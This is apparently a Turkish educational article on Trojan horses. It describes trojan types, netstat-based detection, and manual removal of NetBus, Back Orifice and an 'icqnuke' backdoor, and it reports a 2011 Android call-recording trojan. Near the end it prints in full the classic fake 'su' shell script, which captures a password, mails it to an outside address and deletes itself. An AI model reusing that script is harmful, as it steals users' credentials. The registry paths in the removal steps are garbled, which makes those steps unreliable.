Truva Atı

Trojan bilgisayarınıza sizin bilginiz olmadan yerleşen, içerdiği tehlikeli kodlar sayesinde sisteminizi herhangi bir bilgisayar aracılığı ile (ağ ya da internet) kontrol etmek isteyen kişilere açık hale getiren tehlikeli programlardır. Truva atları bilgisayar virüsleri gibi kendi başlarına işlem yapamazlar,yani kullanıcı izin vermediği sürece hiçbir trojan o bilgisayarda çalışmaz. Bu programlar sayesinde casus kişiler sistem üzerinde herhangi bir kontrolü yerine getirebilecek durumda olurlar. Truva atları bu işlemi sisteme yerleştikten sonra açtıkları bir port aracılığı ile gerçekleştirdiğinden dial-up modem kullanıcıları değişken IP numaraları sayesinde diğer bağlantı türlerine göre daha az risk altındadır. Ancak yine de port taraması yapan bir kişi sistemdeki bu açık portu keşfettiğinde bilgisayarı kontrol altına alması an meselesidir. Sisteme çeşitli yollardan sızabilirler,büyük çoğunluğu hileli programların çalıştırılmasıyla oluşur. Bu tehlikeli programlar, sistemi ele geçirmek amacı taşıyan kişilerce yazılan, diğer programların içine yerleştirilerek bulaşır. Bunlara genellikler “arka kapı(backdoors)” denir. Bunun dışında zararlı bir web sitesi ziyareti  ve ya güvenli olmayan bir e-mail sayesinde de olabilir.Truva atları sistemde nasıl gedik açabildiğine ve nasıl tahribat yaptığına göre sınıflandırılır. 7 ana tür Truva atı zararlı yükü vardır.

 

·        Uzaktan Erişim
Kullanıcıların bütün sistemini kontrol etmek için tasarlanmıştır. Genellikle oyunların ve  şüphe çekmeyen küçük programların içine saklanır.

 

·        E-posta Gönderme
Kullanıcıların parola ya da kredi kartı gibi kişisel bilgilerini ele geçirmek için tasarlanmıştır. Truva atı daha önceden belirlenmiş bilgiyi çalabilir ve ya sisteme keylogger yükleyerek, bütün klavye hareketlerini, casusa gönderebilir.
·        Veri Yıkımı
Truva atının virüse en çok benzeyen türü olarak kabul edilebilir. Sistemdeki dosyaları silmek ve yok etmek için tasarlanmıştır. Bir antivirüs yazılımı tarafından tespit edilebilir.
·        Proxy Truva
Kurbanların bilgisayarlarını bir proxy sunucusu olarak kullanmak üzere tasarlanmıştır. Bu saldırgana, o kullanıcıya ait bilgisayarda, kredi kartı dolandırıcılığı ve diğer illegall aktiviteler dahil herhangi bir şey yapmaya veya diğer ağlara kötü niyetli saldırılar düzenlemeye olanak sağlar.
·        FTP Truva
21.portu açmak ve saldırganın FTP kullanarak kullanıcı bilgisayarına bağlanmasını sağlamak için tasarlanmıştır.
·        Güvenlik Yazılımını Devre Dışı Bırakma
Bilgisayarda bulunan antivirüs programı ya da güvenlik duvarını kullanıcıdan habersiz devre dışı bırakmak için tasarlanmıştır. Genellikle bu tür bir truva atı başka çeşit bir truva atıyla birleştirilerek kullanılır.
·        Hizmetin Reddi Servis Saldırıları (Dos Saldırıları)
DDos saldırılarını düzenlemek adına bilgisayar ağı kurmak için tasarlanmıştır.

 

Bilgisayarda Truva Atı Tespiti

 

Eğer bilgisayar kullanıcı kontrolü dışında bazı olaylar gerçekleştiriyorsa büyük bir ihtimalle trojan var denilebilir ama bunu tespit etmenin başka yolları da mevcut örneğin güncel anti-trojan programları kullanmak gibi. Fakat en garanti yol dos moduna geçtikten sonra ntstat –a yazmaktır. Bu komut bilgisayarın internetten hangi porta bağlı olduğunu gösterir. Eğer bu program çalışmıyorsa herhangi bir problem yok, lakin bir sonuç döndürüyorsa bilgisayarınızda trojan var demektir. Örneğin en çok bilinen trojan netbus, 0.0.0.0:12345 portunu kullanır.

Korunmak için Alınabilecek Önlemler

Firewall,antivirüs,antispyware yazılımı kullanmak, işletim sistemini düzenli olarak güncellemek, internet tarayıcısının güvenlik seviyesini arttırmak, güvenli sitelerden program indirmek başlangıç olarak alınabilecek önlemlerdir.
Bilinen Bazı Truva Atları ve Temizleme Yöntemleri
 

NETBUS

Port Numarası: 12345, 12346
Dosya Adı: “patch.exe”
Boyutu: 470 Kb
Dizini: “C:WindowsSystem
1.       Registry’nizdeki HKEY_LOKAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRun “patch.exe.” kaydını arayın.Söz konusu kaydı bulamazsanız trojan’ın adı değiştirilmiş demektir.Bu durumda aynı Registry anahtarı altında yer alan tüm EXE kayıtlarını not alın ve “C:WindowsSystem dizinindeki EXE dosyalarıyla karşılaştırın.470 KB boyutunda olan dosya, adı değiştirilmiş NetBus trojanıdır.Registry kaydını silin.
2.       Bir MS-DOS Komut İstemi penceresi açın ve “C:WindowsSystempatch.exe/remove” komutunu kullanın.(Trojanın adı değiştirilmişse, patch.exe yerine PC’nizdeki adını yazın.)
3.       “C:WindowsSystempatch.exe” dosyasını silin.

BACK ORIFICE

Port Numarası: 31337
Dosya Adı: “.exe”
Boyutu: 126 kb
Dizini: C:Windowssystem
1.       Registry’nizdeki HKEY_LOKAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunServices “.exe” kaydını silin
2.       PC’nizi yeniden başlatın.
3.       Windows Explorer’ı başlatın.Görünüm Klasör Seçenekleri menüsündeki Görünüm sekmesini açın ve Gizli Dosyalar bölümünde “Tüm Dosyaları Göster” seçeneğinin işaretli olduğundan emin olun.
4.       “C:WindowsSystem.exe” dosyasını silin.
5.       PC’nizi yeniden başlatın.

 

BACKDOOR


Port Numarası: 1999
Dosya Adı: “icqnuke.exe”
Boyutu: 102 Kb
Dizini: C:Windows, C:Windowssystem
1.       Registry’nizdeki HKEY_LOKAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRun “icqnuke.exe.” kaydını silin
2.       PC’nizi MS-DOS kipinde başlatın.
3.       “C:Windowsicqnuke.exe” ve “C:WindowsSystemicqnuke.exe” dosyalarını silin.
4.       PC’nizi yeniden başlatın.
Bazı Örnekler
 

1-Android’ de yeni trojan ortaya çıktı

 
Android Market’ deki bazı uygulamalar ile bulaşan trojanlar tespit edildi.
 
Google Android şüphesiz en çok kullanılan platform. Milyonlarca kullanıcıya ulaşan böyle bir platformunda mutlaka başında belalar olur. Apple, sıkı kuralları nedeni ile App Store’ a trojan sokmuyor fakat Android açık kaynak kodlu bir proje olduğu ve daha esnek geliştirme ortamı sunduğu için kötü niyetli kişiler bunu fırsata çevirmeye çalışıyor. Bir ara Android Marketi, DroidDream Light ve Zitmo isimli zararlı uygulamalar ele geçirmiş ve 5000 Android’ li cihaza bulaştığı belirlenmişti. Bunun üzerine Google virüslerle ilişkili uygulamaları hemen mağazadan kaldırdı. Ancak tehlike hala devam ediyor.
Bir güvenlik firması olan CA Technologies, Android mağazasında yeni bir tehlikeli trojan farketti. Trojan diğer örnekleri gibi kredi kartınızın yada herhangi bir şifrenizi ele geçirmiyor. Trojanın görevi yapılan telefon görüşmelerini ARM formatında SD kartın içine shangzhou/callrecord adlı bir klasöre kayıt ediyor. Daha sonra ise bu dosyanın uzaktaki bir sunucuya aktarıldığı düşünülüyor.
CA Technologies, trojanın henüz hareket alanının olmadığını belirtiyor. Bu demek oluyor ki trajon yayılmıyor. Fakat yayılmaması tehlikeli olmadığı anlamına gelmiyor.
Eğer Android kullanıyorsanız bahsettiğimiz klasöre bir göz atın.
Truva Atı

 

www.teknolojioku.com sitesinin 03/08/2011 haberinde de görüldüğü gibi truva atları sadece kişisel bilgisayarlarda değil mobil dünya  içinde de baş göstermeye başladı.

2-Trojan Horses

 
Morris ve Gramp tarafından hazırlanan örnekte Truva atı, kendini Unix işletim sisteminde su komutu gibi gösteriyor. Truva atının shell script’i kullanıcının yolundaki bir dizinde su dosyasına yerleştiriliyor. Shell script’inin kodu ise şöyle;
stty -echo
echo “Password: c”
read X
echo “”
stty echo
echo $1 $X | mail outside!creep &
sleep 1
echo Sorry.
rm su

Bunun ardından kullanıcı su yazdığı anda Truva atının su komutu kullanıcı adının ve parolasını daha önce belirtilmiş kişiye yani outside!creep’e gönderip kullanıcı güvenliğini tehlikeye atıyor. Daha sonra sahte komut kendini yokediyor. Kullanıcı ise parolanın yanlış girildiğiyle alakalı bir sorunla karşılaşıyor. Kullanıcı tekrar denediğinde gerçek su komutu çalışıyor ve kullanıcı, doğru parolayı girdikten sonra admin olarak bağlanabiliyor.

Erim TALİ